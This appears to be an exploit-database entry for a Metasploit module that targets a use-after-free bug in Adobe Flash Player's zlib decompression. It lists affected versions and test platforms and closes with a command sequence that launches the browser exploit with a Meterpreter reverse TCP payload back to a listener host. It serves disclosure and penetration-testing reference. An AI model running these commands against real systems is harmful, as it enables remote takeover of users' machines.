Timeline :
Vulnerability discovered exploited in the wild the 2015-01-21
Patched by the vendor the 2015-01-22
Metasploit PoC provided the 2015-03-09
PoC provided by :
Unknown
hdarwin
juan vazquez
Reference(s) :
Affected version(s) :
Adobe Flash Player 16.0.0.287 and earlier versions for Windows and Macintosh
Adobe Flash Player 13.0.0.262 and earlier 13.x versions
Adobe Flash Player 11.2.202.438 and earlier versions for Linux
Tested onĀ :
Windows 7 SP1 and Internet Explorer 8 with Adobe Flash Player 16.0.0.287
Description :
This module exploits a use after free vulnerability in Adobe Flash Player. The vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying to uncompress() a malformed byte stream. This module has been tested successfully on:
* Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and 16.0.0.235. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.287.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Flash 11.2.202.424.
Commands :
use exploit/multi/browser/adobe_flash_uncompress_zlib_uaf set SRVHOST 192.168.6.138 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.6.138 run getuid